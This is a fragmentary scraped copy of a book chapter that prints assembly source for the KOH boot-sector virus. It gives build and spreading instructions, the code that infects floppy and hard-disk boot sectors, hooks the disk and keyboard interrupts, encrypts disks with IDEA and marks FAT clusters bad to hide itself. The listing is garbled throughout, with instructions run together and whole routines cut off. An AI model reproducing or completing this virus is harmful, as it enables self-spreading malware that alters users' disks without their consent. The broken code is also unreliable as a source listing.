the giant black book of computer viruses phần 10 doc

To migrate KOH to the hard disk, just boot from the infected floppy.. BUF_SIZE EQU 9 ;Internal disk buffer size, in sectors VIR_SIZE EQU 9 ;Virus size, less boot sector, in sectors VIRUS

Legal Warning

As of the date of this writing, the KOH virus is illegal to export

in executable form from the US If you create an executable of it from the code in this book, and export it, you could be subject to immediate confiscation of all your property without recourse, and possibly also to jail after a trial There is, however, no restriction (at present) against exporting this code in printed form, as in this book.

The KOH Source

KOH consists of several modules which must all be present on the disk to assemble it properly KOH.ASM is the main file, which includes the loader, the boot sector, the interrupt handlers, hard disk encryptor, etc KOHIDEA.ASM is an include file that contains the code for the IDEA algorithm FATMAN.ASM is the FAT manager routines These differ slightly from the FATMAN.ASM originally listed with the BBS virus because the FAT is sometimes encrypted The PASS.ASM include file contains the pass phrase entry rou- tines, and RAND.ASM contains the pseudo-random number gen- erator.

To build the KOH virus, just assemble KOH.ASM, preferably using TASM Then, run the KOH.COM file you produce to infect and encrypt a diskette in the A: drive (or specify B: on the command line if you’d rather use your B: drive) To migrate KOH to the hard disk, just boot from the infected floppy KOH will ask if you want

it to migrate to the hard disk; just answer yes.

When you assemble KOH, make sure the code does not overrun the scratchpad buffer where the disk is read into and written from.

If you do, it will cause KOH to crash Since KOH is highly optimized and crunched into the minimum amount of space avai- able to it, an assembler that did not optimize the assembly could cause code to overflow into this buffer, which is located just below the boot sector.

The KOH.ASM Source

;Source Listing for the Potassium Hydroxide virus.

; (C) 1995 by The King of Hearts, All rights reserved.

;Licensed to American Eagle Publications, Inc for use in The Giant Black Book

;of Computer Viruses

;

;Version 1.00

; Initial release - beta only

;Version 1.01

; Upgrade to fix a number of bugs in 1.00, gets rid of casual encryption

; and encrypts only one partition on disk, not whole disk, instant HD

; password change.

;Version 1.02

; Fixes failure of SETUP_HARD on some disks because the INT 41H vector

; doesn’t always point to a proper drive parameter table.

; Fixes problem with some floppy drives that messes up 2nd FAT table.

;Version 1.03

; Fixes inability to infect some floppy disks that are almost full but not

; quite.

;Both of the following should always be odd for this to work right.

BUF_SIZE EQU 9 ;Internal disk buffer size, in sectors VIR_SIZE EQU 9 ;Virus size, less boot sector, in sectors

VIRUS SEGMENT BYTE

mov [HPP],OFFSET FDHPP ;floppy password

call MASTER_PASS ;create a new password

mov bx,80H ;check parameter

add BYTE PTR [SUCCESS_MSG+17],al

jmp SHORT PAR2

PAR1: mov dl,0

PAR2: mov ax,0201H

mov bx,OFFSET DUMMY_BUF

ABORT_MSG DB ’Initial load failed aborting.$’

SUCCESS_MSG DB ’Load successful A: now encrypted with KOH.$’ STRING_LIST DW OFFSET SURE

DW OFFSET ENCRYPT_QUERY1

DW OFFSET PW_EXPLAIN

DW OFFSET STOP_MSG

DW OFFSET FD_PWASK

MEMSIZE DW 640 ;size of memory installed, in KB

WELCOME_MSG DB ’Potassium Hydroxide (KOH) Version 1.03 Loader

by the King of Hearts’,0DH,0AH

DB ’(C) 1995 American Eagle Publications, Inc All rights reserved.’,0DH,0AH,0AH

DB ’This loader will migrate the KOH encryption system to

a floppy disk of your’,0DH,0AH

DB ’choice (A or B) as specified on the command line ter encrypting, you must’,0DH,0AH

DB ’boot from that floppy to activate the decryption, or

to migrate to a hard disk.’,0DH,0AH

DB ’This program uses the IDEA algorithm (implementation not developed in the US)’,0DH,0AH

DB ’in conjunction with a pass phrase up to 128 bytes long Floppies and hard disks’,0DH,0AH

DB ’have their own separate pass phrases The floppy uses

it directly The hard’,0DH,0AH

DB ’disk is encrypted with a 16 byte random number, which

is decrypted with its’,0DH,0AH

DB ’pass phrase Three commands can be activated when KOH

LOCAL_STACK:

FDHPP DB 16 dup (0) ;floppy disk hashed pass phrase

HDKEY DB 16 dup (0) ;hard disk key, used to encrypt/decrypt sectors HDHPP DB 16 dup (0) ;hard disk hashed pass phrase, to encrypt HDKEY

IDEAVIR: ;A label for the beginning of the virus

;*******************************************************************************

;* INTERRUPT 13H HANDLER *

;*******************************************************************************

;This routine must intercept reads and writes to the floppy disk and encrypt/

;decrypt them as necessary.

OLD_13H DD ? ;Old interrupt 13H vector goes here OLD_9 DD ? ;Old interrupt 9 vector goes here

;The following calls the original rom bios INT 13 DO_INT13 just calls it once.

;DO_INT13E does error handling, calling it once, and if an error, doing a

;disk reset, and then calling it again, returning c if there is an error DO_INT13E:

mov BYTE PTR cs:[MOTOR_FLAG],1

I13R: jmp DWORD PTR cs:[OLD_13H]

;*******************************************************************************

;This section of code handles all attempts to access the Disk BIOS Function 3,

;(Write) If an attempt is made to write any sectors except the boot sector,

;this function must encrypt the data to write, write it, and then decrypt

;everything again If the boot sector is written, it must not be encrypted!

WRITE_FUNCTION:

mov BYTE PTR cs:[ACTIVE],1

mov cs:[CURR_DISK],dl ;set this with current disk no mov cs:[SECS_READ],al

jz WF2

call DECRYPT_DATA

WF2: popf

WF3: mov BYTE PTR cs:[ACTIVE],0

retf 2 ;return and pop flags off stack

;*******************************************************************************

;This section of code handles all attempts to access the Disk BIOS Function 2,

;(Read) If an attempt is made to read any sectors except the boot sector,

;this function must allow the read to proceed normally, and then decrypt

;everything read except the boot sector.

DOREAD1:call IS_ENCRYPTED ;is disk encrypted?

jz DONE_DECRYPT ;no, don’t try to decrypt it call DECRYPT_DATA

jmp WF3 ;return and pop flags off stack

;This routine determines if CURR_DISK is encrypted or not It returns with

;Z set if it isn’t encrypted, and reset if it is It is assumed that dl

;contains the current disk # on entry No registers are changed.

IS_ENCRYPTED:

cmp dl,80H ;is it a hard drive?

jnc IE_HD ;yes, check it specially

pop cx

ret

IE_HD: jnz IEZ ;drive other than c: ?

push ax

mov al,cs:[HD_CRYPT] ;see if HD is encrypted

or al,al ;and set flag properly

;This routine decrypts using IDEA On entry, ax, es:bx, cx and dx must be set

;up just like they are for the INT 13 All registers are preserved on this

;call This routine does not change the stack.

DECRYPT_DATA:

mov BYTE PTR cs:[cfb_dc_idea],0FFH

jmp SHORT CRYPT_DATA

;This routine encrypts using IDEA On entry, ax, es:bx, cx and dx must be set

;up just like they are for the INT 13 All registers are preserved on this

;call This routine does not change the stack.

ED1: or dh,dh ;is it head 0?

jnz ED2 ;nope, go encrypt

cmp cx,1 ;is it track 0, sector 1?

jz ED3 ;nope, go encrypt

;This routine increments cx/dx to the next sector On floppies, it just incre

;increments cl, the sector number On HD’s, it must also handle head and track

;number This includes the AMI extension to handle more than 1024 cylinders

;Returns nc if it is past the last sector on disk.

;This routine does all that is needed to infect a floppy disk It determines

;whether the disk is infected, and if so, attempts an infect.

mov ax,WORD PTR [BS_HEADS]

mov [HPP],OFFSET FDHPP ;use floppy password

call SHOULD_INFECT ;should we infect the floppy? jnz IF_END

mov cl,dl ;get current disk number mov al,0FEH

rol al,cl ;assume we’re not encrypted now, and [CRYPT_FLAG],al ;so reset the crypt flag

mov ax,0201H ;move boot sector into BUF

mov bx,OFFSET SCRATCHBUF

mov cx,1

mov dh,0

int 40H ;read boot sector

jnc INF2 ;read was ok

cmp ah,6 ;change flag set if ah=6 jnz INF1

mov [CHANGE_FLAG],ah ;so save it here

INF1: mov ax,0201H

int 40H ;try again

mov al,BYTE PTR [SCRATCHBUF+15H] ;get boot sector ID

xor al,BYTE PTR [SCRATCHBUF+200H] ;xor with FAT ID

jnz INF5 ;not same, encrypted, so skip cmp WORD PTR [SCRATCHBUF+201H],0FFFFH ;better be FFFF

jnz INF5 ;else encrypted

cmp [FD_INFECT],1 ;should we infect??

jz INF55 ;nope, don’t encrypt

call INIT_FAT_MANAGER ;set up disk parameters call ENCRYPT_FLOPPY ;and encrypt the disk

jc IF_END ;if error, exit and don’t infect mov ax,0201H ;re-load boot sec after encrypt mov cx,1

jz IF_END

call IS_VBS ;is viral boot sector there? jnz INF6 ;nope, go infect it

jmp SHORT IF_END ;else exit

INF6: call INIT_FAT_MANAGER ;initialize disk parameters call MOVE_VIRUS_FLOPPY ;and infect, if possible IF_END: pop ax

mov WORD PTR [BS_SECTORS_ON_DISK],ax

pop si

pop di

pop es

pop ds

ret ;return with flags set properly

;Set the CRYPT_FLAG for the current disk.

;This routine determines whether we should infect now It signals time to

;infect only if the drive motor is off If the caller should proceed with

;infection, the Z flag is reset on return On entry, dl should contain the

;drive number to check, and dl should not be changed by this routine.

mov cl,dl ;cl=drive number

shr al,cl ;put motor status for current drive in bit 0 of al and al,1 ;mask all other bits

;This routine encrypts the floppy disk in preparation for infecting it.

;The drive number is put in [CURR_DISK] before this is called This uses the

;interrupt 13H handler to do the encryption.

ENCRYPT_FLOPPY:

mov cx,2 ;int 13 parameters

xor dh,dh ;skip encrypting boot sector! mov dl,[CURR_DISK]

mov [FIRST],ch ;set first=0

mov bx,OFFSET SCRATCHBUF

EFLP: cmp BYTE PTR [CURR_DISK],80H

jne EFL0

call DISP_STATUS

EFL0: mov al,BUF_SIZE

mov ah,BYTE PTR [SECS_PER_TRACK]

push cx

call DO_INT13E ;read sector without decryption

jc EF_RDERR ;exit on error

jc EF_WRERR ;and keep trying

mov BYTE PTR [FIRST],1

EFL2: mov al,[SECS_READ]

EFL3: call NEXT_SEC

jnc EF_EX

dec al

jnz EFL3

jmp EFLP

EF_ERR: stc ;set carry on error

EF_EX: ret ;and exit now

;Handle read/write errors on disks here Above is multiple sector read/write,

;but the following does it sector by sector, whenever an error occurs in a

;read or write on a sector.

EF_WRERR:

cmp BYTE PTR [FIRST],0

jz EF_ERR ;first write attempt? write protected

or al,al ;make sure nothing was written to disk

mov si,OFFSET CYL_LABEL

;This routine puts the virus on the floppy disk It has no safeguards to

;prevent infecting an already infected disk That must occur at a higher level

;Also, it does not encrypt the floppy disk That occurs elsewhere On entry,

;[CURR_DISK] must contain the drive number to act upon.

MOVE_VIRUS_FLOPPY:

mov bx,VIR_SIZE+1 ;number of sectors requested call FIND_FREE ;find free space on disk jnc INF01 ;exit now if no space

call DO_INT13E ;read original boot sector

mov si,OFFSET BOOT_START ;build floppy viral bs

mov di,OFFSET SCRATCHBUF + 512 ;temp buf for floppy viral bs mov cx,256

rep movsb ;floppies too

pop cx

call CLUST_TO_ABSOLUTE ;set cx,dx up with trk, sec, hd info mov WORD PTR [VIRCX - OFFSET BOOT_START + OFFSET SCRATCHBUF + 512],cx

mov BYTE PTR [VIRDH - OFFSET BOOT_START + OFFSET SCRATCHBUF + 512],dh ;save in viral bs

mov BYTE PTR [CHANGE_FLAG - OFFSET BOOT_START + OFFSET SCRATCHBUF +512],0

mov dl,[CURR_DISK]

mov bx,OFFSET IDEAVIR

mov si,VIR_SIZE+1 ;read/write VIR_SIZE+1 sectors MVF2: push si

mov ax,0301H ;read/write 1 sector

call DO_INT13E ;call BIOS to read it

pop si

jc IFEX ;exit if it fails

add bx,512 ;increment read buffer

inc cl ;get ready to do next sector cmp cl,BYTE PTR [SECS_PER_TRACK] ;last sector on track?

jbe MVF3 ;no, continue

mov cl,1 ;yes, set sector=1

inc dh ;try next side

cmp dh,2 ;last side?

jb MVF3 ;no, continue

xor dh,dh ;yes, set side=0

inc ch ;and increment track count MVF3: dec si

;Infect Hard Disk Drive AL with this virus This involves the following steps:

;A) Read the present boot sector B) Copy it to Track 0, Head 0, Sector 7.

;C) Copy the disk partition info into the viral boot sector in memory D) Copy

;the viral boot sector to Track 0, Head 0, Sector 1 E) Copy the IDEAVIR

;routines to Track 0, Head 0, Sector 2, 5 sectors total.

or ax,ax ;this better not be 0 or no room

jz IH01 ;else ok to infect

mov ax,301H

call DO_INT13E

mov di,OFFSET PARTPRE

mov si,OFFSET SCRATCHBUF + 1ADH

mov cx,51H ;copy partition table

rep movsb ;to new boot sector too!

mov bx,OFFSET PART - 10H

IH1: add bx,10H ;set up partition parameters cmp BYTE PTR [bx],80H

;This routine is the highest level routine handling hard disk encryption It

;asks permission to encrypt and then does it to one or two drives, depending

;on how many are present It uses a separate hard disk password to do the

;encrypting, and this is separate from the floppy disk password entered when

;the drive was originally infected Return with Z set if successful.

ENCRYPT_HARD_DISK:

call CLEAR_SCREEN

mov si,OFFSET ENCRYPT_QUERY1

call ASK ;ask if one wants hd encrypted jnz ASKR

mov BYTE PTR [HD_CRYPT],2

EHD1: mov si,OFFSET PW_EXPLAIN

stosb ;save it for key

mov ax,0E2EH ;display a ’.’ to indicate int 10H ;program is working right cmp di,OFFSET HDKEY + 16

jnz EHD2 ;loop until 16 bytes done

push ds ;now hash with low memory xor ax,ax ;segment 0, for added randomness mov ds,ax

mov di,OFFSET HDKEY

EHD37: loop EHD35

mov si,OFFSET STOP_MSG ;tell user to stop

mov [CURR_DISK],al ;save drive number

call ENCRYPT_HARD ;and go encrypt it

xor al,al ;set z for successful returns EHDR: ret

;Save floppy disk hashed pass phrase and hard disk key to disk

and al,4 ;is the CTRL down?

jz I9EXIT ;nope, pass control to bios

and ah,8 ;is the ALT down?

jz I9EXIT ;nope, pass control to bios

call DO_INT13E

jc HUR

mov si,OFFSET PARTPRE ;update partition table mov di,OFFSET SCRATCHBUF + 1ADH ;to current one in viral mov cl,51H ;boot sector

cmp BYTE PTR [HD_CRYPT],0 ;is drive encrypted?

jz HUR ;no, all done

mov BYTE PTR [REMOVE],0FFH

mov [HPP],OFFSET HDKEY

call EHD_SUBR ;decrypt the hard disk(s) mov BYTE PTR [REMOVE],0

HUR: cld

mov di,OFFSET INT_13H ;reroute interrupts

call KILL_INT ;back to old handlers

mov ax,OFFSET OLD_13H

mov si,OFFSET HD_PWCHASK

call ASK ;and user wants to change it jnz FDPW

mov al,20H ;reset 8259 controller

out 20H,al ;for all machines

;This routine decodes cyl, hd, sec info in dh/cx in standard BIOS format into

;cx=cylinder, dh=head, dl=sector Only cx and dx are modified.

;Strings for the virus go here

SURE DB ’Sure you want to uninstall? ’,0

ENCRYPT_QUERY1 DB ’KOH-Encrypt your HARD DISK now (please backup first)?

DB ’Begin pressing keys.’,0DH,0AH,0

STOP_MSG DB 7,7,7,7,’OK, stop Press ESC to continue.’,0DH,0AH,0 FD_PWASK DB ’Enter the FD PW now.’,0DH,0AH,0

HD_PWCHASK DB ’Do you want to change the HD password? ’,0

FD_PWCHASK DB ’Do you want to change the FD password? ’,0

PW_HDEX DB ’Now enter HD PW.’,0DH,0AH,0

HARD_ASK DB ’KOH 1.01-Migrate to hard drive on this computer (please backup)? ’,0

ALL_DONE DB ’Done You may continue.’,0

NO_ROOM DB ’No room to migrate to HD!’,7,0DH,0AH,0

UPDATE_MSG DB ’Uninstall old version to update to V1.02! Press any key.’,0

DB 512*BUF_SIZE - 2*PW_LENGTH dup (?)

;These routines share the scratch buffer with disk IO Be careful!

;PASSWD EQU OFFSET SCRATCHBUF

;PASSVR EQU OFFSET SCRATCHBUF + PW_LENGTH

;*******************************************************************************

;* THIS IS THE REPLACEMENT (VIRAL) BOOT SECTOR *

;*******************************************************************************

BS_BYTES_PER_SEC DW ? ;bytes per sector

BS_SECS_PER_CLUST DB ? ;sectors per cluster

BS_RESERVED_SECS DW ? ;reserved sectors at beginning of disk BS_FATS DB ? ;copies of fat on disk

BS_DIR_ENTRIES DW ? ;number of entries in root directory BS_SECTORS_ON_DISK DW ? ;total number of sectors on disk BS_FORMAT_ID DB ? ;disk format ID

BS_SECS_PER_FAT DW ? ;number of sectors per FAT

BS_SECS_PER_TRACK DW ? ;number of sectors per track (one head) BS_HEADS DW ? ;number of heads on disk

BS_DBT DB 25 dup (?)

;The following are the CX and DH values to indicate where the rest of the

;virus is located These are set by INFECT_FLOPPY, as needed by INT 13H VIRCX DW ?

VIRDH DB ?

HPP DW OFFSET FDHPP ;pointer to hashed pass phrase BSLOC_DH DB ? ;active boot sec location on hard disk BSLOC_CX DW ?

;The following two bytes must remain contiguous!

CHANGE_FLAG DB 0 ;if <> 0, change line was just called FD_INFECT DB 0 ;1=automatic floppy infect turned off

;The following two bytes must remain contiguous!

DR_FLAG DB ? ;drive flag, indicates hard disk boot HD_CRYPT DB ? ;Hard disk encryption, 0=OFF, 2=Strong

CRYPT_FLAG DB ? ;encryption on/off flag for floppies MOTOR_FLAG DB ? ;set if motor turned on

REMOVE DB 0 ;FF=uninstalling, 0=not uninstalling FIRST DB 0 ;flag to indicate first write failure

;The following two bytes must remain contiguous

ACTIVE DB 1 ;this is 1 whenever in an int 13 or ;int 9, and during boot up, helps avoid ;Ctrl-Alt-KOH when could cause trouble FORMAT_FLAG DB 0 ;flag set when an int 13, fctn 5 is ;called, overrides motor to infect ;next read

FIRST_SEC DB 0 ;first cyl, hd, sec of

FIRST_HEAD DB 0 ;active partition

FIRST_CYL DW 0

LAST_SEC DB 0 ;last cyl, hd, sec of

LAST_HEAD DB 0 ;active partition

shl ax,cl ;convert KBytes into a segment sub ax,7E0H ;subtract enough so this code mov es,ax ;will have the right offset to sub [MEMSIZE],(VIR_SIZE+BUF_SIZE+2)/2;go memory resident in high ram

GO_RELOC:

mov si,OFFSET BOOT_START ;set up ds:si and es:di in order mov di,si ;to relocate this code

mov cx,256 ;to high memory

rep movsw ;and go move this sector push es

mov ax,OFFSET RELOC

push ax ;push new far @RELOC onto stack retf ;and go there with retf

RELOC: ;now we’re in high memory push es ;so let’s install the virus pop ds

mov bx,OFFSET IDEAVIR ;set up buffer to read virus mov dl,[DR_FLAG]

jc LOAD1 ;try again if it fails

add bx,512 ;increment read buffer

inc cl ;get ready to do next sector cmp cl,BYTE PTR [BS_SECS_PER_TRACK] ;last sector on track?

jbe LOAD2 ;no, continue

mov cl,1 ;yes, set sector=1

inc dh ;try next side

cmp dh,BYTE PTR [BS_HEADS] ;last side?

jb LOAD2 ;no, continue

xor dh,dh ;yes, set side=0

inc ch ;and increment track count LOAD2: dec si

jnz LOAD1

MOVE_OLD_BS:

xor ax,ax ;now move old boot sector into mov es,ax ;low memory

mov si,OFFSET SCRATCHBUF ;at 0000:7C00

mov di,OFFSET BOOT_START

mov cx,1ADH

rep movsb

add si,OFFSET BOOT_START - OFFSET SCRATCHBUF

mov cl,53H ;move viral bs partition table rep movsb ;into original bs

call INSTALL_INT_HANDLERS ;install int 9 and 13H handlers

FLOPPY_DISK: ;if loading from a floppy drive, call IS_HARD_THERE ;see if a hard disk exists here

jz DONE ;no hard disk, all done booting

mov ax,0201H

mov bx,OFFSET SCRATCHBUF ;read real partition sector

mov dx,80H

call DO_INT13E

mov si,OFFSET SCRATCHBUF + 1AEH

HDBOOT: add si,10H ;find active bs and save its loc mov ax,[si] ;so it doesn’t get encrypted cmp al,80H

jmp SHORT DONE ;yes, all done booting

HDB2: call INFECT_HARD ;else go infect hard drive(s)

DONE: mov bx,OFFSET HPP

mov [bx],OFFSET FDHPP ;assume a floppy PW for now cmp [DR_FLAG],80H ;check hard disk encryption jnz DONE4

mov [bx],OFFSET HDHPP

cmp [HD_CRYPT],0

jnz DONE4

call ENCRYPT_HARD_DISK ;if not encrypted, ask to do it!

jz SHORT DONE5 ;encryption successful, done mov [HPP],OFFSET FDHPP

DONE4: call DECRYP_PASS ;get decryption password cmp [HPP],OFFSET FDHPP ;did we get floppy password?

jz DONE5 ;yes, that’s it for now mov ax,0201H ;no, read FDHPP from disk mov bx,OFFSET SCRATCHBUF

;This routine determines if a hard drive C: exists, and returns NZ if it does,

;Z if it does not To save space above, the fact that this routine sets cx=0

pop ds

or al,al ;and see if al=0 (no drives) ret

;*******************************************************************************

;Determine whether the boot sector in SCRATCHBUF is the viral boot sector.

;Returns Z if it is, NZ if not It simply compares the BS_ID field with that

;from the virus Returns C if you have the viral boot sector, but an earlier

;version that needs to be updated.

IS_VBS:

mov di,OFFSET BS_ID ;set up for a compare

mov si,OFFSET SCRATCHBUF+3

PARTPRE:DB 11H dup (0) ;added info for XTs

PART: DB 40H dup (0) ;partition table goes here

ORG 7DFEH

DB 55H,0AAH ;boot sector ID goes here

ENDCODE: ;label for the end of boot sec

ENDS VIRUS

END START

The KOHIDEA.ASM Source

;INTERNATIONAL DATA ENCRYPTION ALGORITHM, OPTIMIZED FOR SPEED.

;THIS CODE DESIGNED, WRITTEN AND TESTED IN THE BEAUTIFUL COUNTRY OF MEXICO

;BY THE KING OF HEARTS.

;MUL(X,Y) = X*Y MOD 10001H

;THE FOLLOWING ROUTINE MULTIPLIES X AND Y MODULO 10001H, AND PLACES THE RESULT

;IN AX UPON RETURN X IS PASSED IN AX, Y IN BX THIS MUST BE FAST SINCE IT IS

;CALLED LOTS AND LOTS.

_MUL PROC NEAR

OR BX,BX

JZ MUL3

OR AX,AX

JZ MUL2

;COMPUTE IDEA ENCRYPTION SUBKEYS Z

INITKEY_IDEA PROC NEAR

;THE IDEA CIPHER ITSELF - THIS MUST BE HIGHLY OPTIMIZED

CIPHER_IDEA PROC NEAR

PUSH BP ;WE USE BP INTERNALLY, NOT NORMAL C CALL

MOV SI,OFFSET _Z

MOV DI,ROUNDS ;DI USED AS A COUNTER FOR DO LOOP

DOLP: PUSH AX ;X1, X2, X3, X4 IN REGISTERS HERE PUSH BX

;VOID IDEASEC(BYTEPTR BUF); ENCRYPTS/DECRYPTS A 512 BYTE BUFFER

IDEASEC PROC NEAR

IS0: MOV AX,IDEABLOCKSIZE

IS1: DEC BX ;CHUNKSIZE>0?

JZ ISEX ;NOPE, DONE

CALL CIPHER_IDEA ;CIPHER_IDEA(IV_IDEA,TEMP,Z)

MOV DI,OFFSET _TEMP

STOSW

MOV AX,BX

MOV DI,OFFSET IV ;DI=IV

MOV CX,IDEABLOCKSIZE / 2 ;CX=COUNT

REP MOVSW ;DO *IV++=*BUF++ WHILE (—COUNT); PUSH DS ;SWITCH DS AND ES

MOV SI,65 ;BX=COUNT

IS3: DEC SI ;CHUNKSIZE>0?

JZ ISEX ;NOPE, DONE

MOV DI,OFFSET IV ;DI=IV

MOV CX,IDEABLOCKSIZE / 2 ;CX=COUNT

REP MOVSW ;DO *IV++=*BUF++ WHILE (—COUNT); PUSH DS ;SWITCH DS AND ES

The FATMAN.ASM Source

;12 Bit File Attribute Table manipulation routines These routines only

;require a one sector buffer for the FAT, no matter how big it is.

;The following data area must be in this order It is an image of the data

;stored in the boot sector.

MAX_CLUST DW ? ;maximum cluster number

SECS_PER_CLUST DB ? ;sectors per cluster

RESERVED_SECS DW ? ;reserved sectors at beginning of disk FATS DB ? ;copies of fat on disk

DIR_ENTRIES DW ? ;number of entries in root directory SECTORS_ON_DISK DW ? ;total number of sectors on disk FORMAT_ID DB ? ;disk format ID

SECS_PER_FAT DW ? ;number of sectors per FAT

SECS_PER_TRACK DW ? ;number of sectors per track (one head) HEADS DW ? ;number of heads on disk

;The following data is not in the boot sector It is initialized by

CURR_DISK DB ? ;current disk drive

;This routine is passed the number of contiguous free sectors desired in bx,

;and it attempts to locate them on the disk If it can, it returns the FAT

;entry number in cx, and the C flag reset If there aren’t that many contiguous

;free sectors available, it returns with C set.

or ax,ax ;is entry zero?

jnz FFL2 ;no, go reset sector counter

add dl,[SECS_PER_CLUST] ;else increment sector counter adc dh,0

jmp SHORT FFL3

FFL2: xor dx,dx ;reset sector counter to zero

FFL3: cmp dx,bx ;do we have enough sectors now? jnc FFL4 ;yes, finish up

inc cx ;else check another cluster

cmp cx,[MAX_CLUST] ;unless we’re at the maximum allowed jnz FFL1 ;not max, do another

FFL4: cmp dx,bx ;do we have enough sectors

jc FFEX ;no, exit with C flag set

FFL5: mov al,[SECS_PER_CLUST] ;yes, now adjust cx to point to start xor ah,ah

;This routine marks cx sectors as bad, starting at cluster dx It does so

;only with the FAT sector currently in memory, and the marking is done only in

;memory The FAT must be written to disk using UPDATE_FAT_SECTOR to make

;the marking effective.

;This routine marks the single cluster specified in dx as bad Marking is done

;only in memory It assumes the proper sector is loaded in memory It will not

;work properly to mark a cluster which crosses a sector boundary in the FAT MARK_CLUST_BAD:

push dx

mov cx,dx

call GET_FAT_OFFSET ;put FAT offset in bx

mov ax,bx

mov si,OFFSET SCRATCHBUF ;point to disk buffer

and bx,1FFH ;get offset in currently loaded sector pop cx ;get fat sector number now

mov al,cl ;see if even or odd

shr al,1 ;put low bit in c flag

mov ax,[bx+si] ;get fat entry before branching